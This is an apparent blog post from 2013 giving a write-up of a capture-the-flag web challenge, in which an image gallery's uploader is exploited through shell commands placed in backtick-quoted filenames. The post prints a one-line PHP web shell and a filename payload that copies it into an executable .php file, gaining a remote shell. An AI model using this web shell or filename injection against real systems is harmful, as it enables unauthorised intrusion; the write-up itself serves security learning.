Sunday, May 12, 2013

BaltCTF - WEB200 "Gallery" write-up

BaltCTF is over and I decided to create a write-up for the second web-based task, because I think it was quite fun. The solution might be old news to more experienced people, but figuring it out on my own was exciting. Here goes.


The task was to hack this simple gallery application where users can upload pictures and view them. It was really obvious that there will be a file upload vulnerability, but I decided to check for SQLi, just in case. 

The uploader only accepted png and gif files that were smaller than 1 MB. The first thing that came to my mind was bypassing this and uploading something named shell.png.php. I tried for almost an hour, but nothing helped to bypass the extension limitation. I even tried to put SQLi into the filename, but that didn't work either.

After many tries I had a new idea that actually worked. I uploaded a file with a Unix command in its name surrounded by grave accents:
The uploaded picture's name contained the id of the picture followed by the output of the executed command. The only problem was that the file name was limited to 16 characters:
43-css img


After this I made a bad decision and took a little detour. I decided to write a "shell" that prompts me for commands, creates a file that has the command in its name, uploads the file, views the gallery, finds the picture's file name and prints it out for me. Here is the code in case anybody is interested.

The reason that this failed is that the file name could not contain such special characters as '|' or '>'. Then, after thinking about it for a few minutes I realized that there is a much simpler solution.


The simple solution is the following:
  • Upload a PHP shell with a png extension
  • Rename the file so it has a php extension
So I created a really basic shell in PHP:
<?php echo system($_GET['s']); ?>
I uploaded this as shell.png, and then uploaded another file:
´cd uploads;cd 6a9btoq20khkn8ln5lfhuo6v62;cp 65-shell.png shell.php´.png
This worked and I had a remote shell:

Using the shell I looked around and the file named "picture" contained a flag.

No comments:

Post a Comment